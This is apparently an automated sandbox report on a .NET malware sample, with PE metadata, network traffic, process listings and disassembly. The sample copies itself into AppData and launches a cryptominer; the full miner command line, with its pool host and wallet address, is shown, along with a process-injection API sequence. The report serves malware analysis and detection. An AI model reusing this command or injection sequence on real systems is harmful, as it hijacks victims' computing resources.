                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2b73df0x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2b80000x5b4.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2ba0000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x2b4fa00x70.text
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000x2b54380x2b5600unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x2b80000x5b40x600False0.4231770833333333data4.100599837122123IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x2ba0000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_VERSION0x2b80900x324data
                                                                                          RT_MANIFEST0x2b83c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          May 23, 2023 16:30:42.966169119 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:30:42.985848904 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:30:42.986406088 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:30:43.065582991 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:30:43.085134029 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:30:43.085624933 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:30:43.282708883 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:30:56.877768993 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:30:57.080768108 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:31:01.491835117 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:31:01.581163883 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:31:03.776058912 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:31:03.880321026 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:31:13.896189928 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:31:13.980247021 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:31:25.782275915 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:31:25.880122900 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:31:37.728445053 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:31:37.885164976 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:31:47.966363907 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:31:48.182876110 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:31:56.923937082 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:31:57.074263096 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:31:59.201129913 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:31:59.387062073 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:32:10.388082981 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:32:10.575385094 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:32:21.562840939 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:32:21.686986923 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:32:36.864428043 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:32:37.077795029 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:32:51.504137993 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:32:51.578978062 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:32:51.696830988 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:32:51.716387033 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:32:51.738040924 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:32:51.891436100 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:32:56.988322020 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:32:57.079406023 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:33:01.595695019 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:33:01.689155102 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:33:11.628896952 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:33:11.690028906 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:33:22.149544954 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:33:22.190901995 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:33:34.855365038 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:33:34.895766020 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:33:35.652163029 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:33:35.895600080 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:33:46.998639107 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:33:47.083633900 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:33:54.681701899 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:33:54.896764040 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:33:57.031797886 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:33:57.084539890 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:34:04.661757946 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:34:04.912950993 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:34:17.348527908 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:34:17.398740053 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:34:27.696890116 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:34:27.915334940 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:34:30.048935890 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:34:30.196691036 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:34:43.032084942 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:34:43.088433027 CEST497153333192.168.2.5141.94.96.144
                                                                                          May 23, 2023 16:34:53.160926104 CEST333349715141.94.96.144192.168.2.5
                                                                                          May 23, 2023 16:34:53.401909113 CEST497153333192.168.2.5141.94.96.144

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          May 23, 2023 16:30:42.908279896 CEST5144153192.168.2.58.8.8.8
                                                                                          May 23, 2023 16:30:42.943305969 CEST53514418.8.8.8192.168.2.5

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          May 23, 2023 16:30:42.908279896 CEST192.168.2.58.8.8.80x1db3Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          May 23, 2023 16:30:42.943305969 CEST8.8.8.8192.168.2.50x1db3No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                                          May 23, 2023 16:30:42.943305969 CEST8.8.8.8192.168.2.50x1db3No error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                                                          May 23, 2023 16:30:42.943305969 CEST8.8.8.8192.168.2.50x1db3No error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false
                                                                                          May 23, 2023 16:30:42.943305969 CEST8.8.8.8192.168.2.50x1db3No error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:16:30:09
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          Imagebase:0xa90000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:16:30:23
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:{path}
                                                                                          Imagebase:0x250000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:16:30:23
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:{path}
                                                                                          Imagebase:0x180000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:16:30:23
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:{path}
                                                                                          Imagebase:0x9b0000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:16:30:35
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
                                                                                          Imagebase:0x8f0000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:16:30:39
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 427X8guX5JRRGk4v7gRcwK85MwpjCAN7djGqBAbCETdqc5biVY27pePT3Ctx43QMLAdKAaRDF4KW4HiozmdQ7EHrNczdnfM -p x -k -v=0 --donate-level=1 -t 2
                                                                                          Imagebase:0x140000000
                                                                                          File size:4141064 bytes
                                                                                          MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 71%, ReversingLabs
                                                                                          Reputation:moderate

                                                                                          General

                                                                                          Target ID:8
                                                                                          Start time:16:30:41
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7fcd70000
                                                                                          File size:625664 bytes
                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:16:30:45
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
                                                                                          Imagebase:0x690000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:low

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:16:30:55
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
                                                                                          Imagebase:0x4c0000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.4%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:114
                                                                                            Total number of Limit Nodes:7
                                                                                            execution_graph 18240 2ecd548 18241 2ecd590 SetThreadContext 18240->18241 18243 2ecd5ce 18241->18243 18244 2ec4948 18246 2ec6ca8 VirtualProtect 18244->18246 18247 2ec6ca0 VirtualProtect 18244->18247 18245 2ec4959 18246->18245 18247->18245 18248 2ecd608 18249 2ecd653 ReadProcessMemory 18248->18249 18250 2ecd696 18249->18250 18196 1576a50 GetCurrentProcess 18197 1576aca GetCurrentThread 18196->18197 18199 1576ac3 18196->18199 18198 1576b07 GetCurrentProcess 18197->18198 18200 1576b00 18197->18200 18201 1576b3d 18198->18201 18199->18197 18200->18198 18205 1577009 18201->18205 18202 1576b65 GetCurrentThreadId 18203 1576b96 18202->18203 18206 157707a DuplicateHandle 18205->18206 18207 1577012 18205->18207 18208 1577116 18206->18208 18207->18202 18208->18202 18209 2ec5be7 18213 2ec6ca8 18209->18213 18216 2ec6ca0 18209->18216 18210 2ec5bfb 18214 2ec6cf0 VirtualProtect 18213->18214 18215 2ec6d2a 18214->18215 18215->18210 18217 2ec6cf0 VirtualProtect 18216->18217 18218 2ec6d2a 18217->18218 18218->18210 18219 2ec57e3 18220 2ec57e4 18219->18220 18222 2ec6ca8 VirtualProtect 18220->18222 18223 2ec6ca0 VirtualProtect 18220->18223 18221 2ec57f1 18222->18221 18223->18221 18224 157df18 18225 157df80 CreateWindowExW 18224->18225 18227 157e03c 18225->18227 18259 2ecd6d8 18260 2ecd71b VirtualAllocEx 18259->18260 18261 2ecd752 18260->18261 18262 2ecd1d8 18263 2ecd257 CreateProcessW 18262->18263 18265 2ecd340 18263->18265 18266 2ecd898 18267 2ecd8e3 WriteProcessMemory 18266->18267 18269 2ecd934 18267->18269 18228 2ecdaf0 18229 2ecdc7b 18228->18229 18230 2ecdb16 18228->18230 18230->18229 18234 157e160 SetWindowLongW 18230->18234 18236 157e159 SetWindowLongW 18230->18236 18238 2ecdd70 PostMessageW 18230->18238 18235 157e1cc 18234->18235 18235->18230 18237 157e1cc 18236->18237 18237->18230 18239 2ecdddc 18238->18239 18239->18230 18274 2ecda50 18275 2ecda91 ResumeThread 18274->18275 18276 2ecdabe 18275->18276 18277 1576668 18278 1576678 18277->18278 18282 157678f 18278->18282 18287 15766c8 18278->18287 18279 1576689 18283 1576794 18282->18283 18284 15767f9 18283->18284 18292 1576938 18283->18292 18296 1576928 18283->18296 18284->18279 18288 1576702 18287->18288 18289 15767f9 18288->18289 18290 1576938 2 API calls 18288->18290 18291 1576928 2 API calls 18288->18291 18289->18279 18290->18289 18291->18289 18294 1576945 18292->18294 18293 157697f 18293->18284 18294->18293 18300 15763ac 18294->18300 18297 1576945 18296->18297 18298 157697f 18297->18298 18299 15763ac 2 API calls 18297->18299 18298->18284 18299->18298 18301 15763b1 18300->18301 18303 1577678 18301->18303 18304 1576ca4 18301->18304 18303->18303 18305 1576caf 18304->18305 18309 157b6b0 18305->18309 18315 157b6c8 18305->18315 18306 1577720 18306->18303 18311 157b6f9 18309->18311 18312 157b746 18309->18312 18310 157b705 18310->18306 18311->18310 18321 157ba10 18311->18321 18324 157ba00 18311->18324 18312->18306 18317 157b6f9 18315->18317 18318 157b746 18315->18318 18316 157b705 18316->18306 18317->18316 18319 157ba10 2 API calls 18317->18319 18320 157ba00 2 API calls 18317->18320 18318->18306 18319->18318 18320->18318 18327 157ba50 18321->18327 18322 157ba1a 18322->18312 18325 157ba1a 18324->18325 18326 157ba50 2 API calls 18324->18326 18325->18312 18326->18325 18328 157ba73 18327->18328 18329 157ba8b 18328->18329 18335 157bcd8 18328->18335 18339 157bce8 18328->18339 18329->18322 18330 157ba83 18330->18329 18331 157bc88 GetModuleHandleW 18330->18331 18332 157bcb5 18331->18332 18332->18322 18336 157bcfc 18335->18336 18337 157bd21 18336->18337 18343 157a998 18336->18343 18337->18330 18340 157bcfc 18339->18340 18341 157bd21 18340->18341 18342 157a998 LoadLibraryExW 18340->18342 18341->18330 18342->18341 18345 157bec8 LoadLibraryExW 18343->18345 18346 157bf41 18345->18346 18346->18337

                                                                                            Executed Functions

                                                                                            Function 02EC8668 Relevance: 1.6, Strings: 1, Instructions: 359COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 144 2ec8668-2ec8678 145 2ec867f-2ec868b 144->145 146 2ec867a 144->146 149 2ec868d 145->149 150 2ec8692-2ec86a7 145->150 147 2ec87ab-2ec87b5 146->147 149->147 153 2ec86ad-2ec86b8 150->153 154 2ec87bb-2ec87fc 150->154 157 2ec86be-2ec86c5 153->157 158 2ec87b6 153->158 171 2ec8803-2ec88aa 154->171 159 2ec86c7-2ec86de 157->159 160 2ec86f2-2ec86fd 157->160 158->154 170 2ec86e4-2ec86e7 159->170 159->171 165 2ec86ff-2ec8707 160->165 166 2ec870a-2ec8714 160->166 165->166 173 2ec879e-2ec87a3 166->173 174 2ec871a-2ec8724 166->174 170->158 175 2ec86ed-2ec86f0 170->175 201 2ec88ac 171->201 202 2ec88b1-2ec88d1 171->202 173->147 174->158 181 2ec872a-2ec8746 174->181 175->159 175->160 186 2ec8748 181->186 187 2ec874a-2ec874d 181->187 186->147 189 2ec874f-2ec8752 187->189 190 2ec8754-2ec8757 187->190 191 2ec875a-2ec8768 189->191 190->191 191->158 194 2ec876a-2ec8771 191->194 194->147 196 2ec8773-2ec8779 194->196 196->158 197 2ec877b-2ec8780 196->197 197->158 199 2ec8782-2ec8795 197->199 199->158 205 2ec8797-2ec879a 199->205 201->202 204 2ec88d2 202->204 206 2ec88d9-2ec88f5 204->206 205->196 207 2ec879c 205->207 208 2ec88fe-2ec88ff 206->208 209 2ec88f7 206->209 207->147 219 2ec8afd-2ec8b06 208->219 209->204 209->208 210 2ec894c-2ec8963 209->210 211 2ec892d-2ec8931 209->211 212 2ec89cf-2ec89dc 209->212 213 2ec8968-2ec896c 209->213 214 2ec8a28-2ec8a40 209->214 215 2ec8904-2ec8916 209->215 216 2ec8a45-2ec8a4e 209->216 217 2ec8a02-2ec8a15 209->217 218 2ec8aa3-2ec8ab0 209->218 209->219 220 2ec899f-2ec89ca 209->220 221 2ec8918-2ec892b 209->221 222 2ec8a1a-2ec8a23 209->222 210->206 225 2ec8938-2ec894a 211->225 226 2ec8933 211->226 229 2ec89de 212->229 230 2ec89e3-2ec89fd 212->230 227 2ec896e-2ec897d 213->227 228 2ec897f-2ec8986 213->228 214->206 215->206 231 2ec8a55-2ec8a78 216->231 232 2ec8a50 216->232 217->206 223 2ec8ab7-2ec8abe 218->223 224 2ec8ab2 218->224 220->206 221->206 222->206 237 2ec8ac5-2ec8acc 223->237 238 2ec8ac0 223->238 224->223 225->206 226->225 233 2ec898d-2ec899a 227->233 228->233 229->230 230->206 234 2ec8a7f-2ec8a9e 231->234 235 2ec8a7a 231->235 232->231 233->206 234->206 235->234 239 2ec8ace 237->239 240 2ec8ad3 237->240 238->237 239->240 241 2ec8add-2ec8af8 240->241 241->206
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Y(O`
                                                                                            • API String ID: 0-2605497086
                                                                                            • Opcode ID: e1a605fff79355854da5e3d38921aab2fe36246e12281b945bf7362d087e4ca3
                                                                                            • Instruction ID: 5537c75839d5bb4dbffa14a10c0bcc3280e9935d4ae2e96d9fe76b9876393157
                                                                                            • Opcode Fuzzy Hash: e1a605fff79355854da5e3d38921aab2fe36246e12281b945bf7362d087e4ca3
                                                                                            • Instruction Fuzzy Hash: 9DD19175E4521A9FCB05DFE9C6915EEBBF2BF88310F20D42AD416B7344EB3499028B91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 015794A8 Relevance: .7, Instructions: 655COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.428038306.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1570000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 02c6b30a1f7a96c6a534c167b313ab2b3341a81d836be6fac7f5978be541566d
                                                                                            • Instruction ID: 690c0101fad888fe996b02bb874306ebadeeb9ee6ef6b7b976369ce811a21a41
                                                                                            • Opcode Fuzzy Hash: 02c6b30a1f7a96c6a534c167b313ab2b3341a81d836be6fac7f5978be541566d
                                                                                            • Instruction Fuzzy Hash: 6B52AE31A0061ACFDB15CF58C885AAEB7B2FF45318F4588A9D909AF251D770FD85CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC6DA1 Relevance: .3, Instructions: 307COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 95e6e5af872ac059f9ce0a00e02750c53b6e8d2294649138bd84ead676dae00e
                                                                                            • Instruction ID: 4bfcf199cf10846e6e84ec8b402313a95541cad670eb65e6d8fe1ec80ea78c81
                                                                                            • Opcode Fuzzy Hash: 95e6e5af872ac059f9ce0a00e02750c53b6e8d2294649138bd84ead676dae00e
                                                                                            • Instruction Fuzzy Hash: 3FE16D70916204DFC704DFA9D68599DBFF6FB88310B24D46AD50AAB760DB389D42CF21
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC6DB0 Relevance: .3, Instructions: 306COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c8353c6f25417343a18cfee1f7a691e74919b63187eec80d11503a822b59712
                                                                                            • Instruction ID: 896eb4b895bbb5f8b6141e0a0f58f4f5a2e71bacca42fe4ac12369342d28a20d
                                                                                            • Opcode Fuzzy Hash: 7c8353c6f25417343a18cfee1f7a691e74919b63187eec80d11503a822b59712
                                                                                            • Instruction Fuzzy Hash: C8E16E70916204DFC704DFA9D68599DBFF6FB88310B24D06AD51AAB760DB389D42CF21
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02EC81D0 Relevance: .2, Instructions: 242COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.429134472.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2ec0000_Vsob3IooE7.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
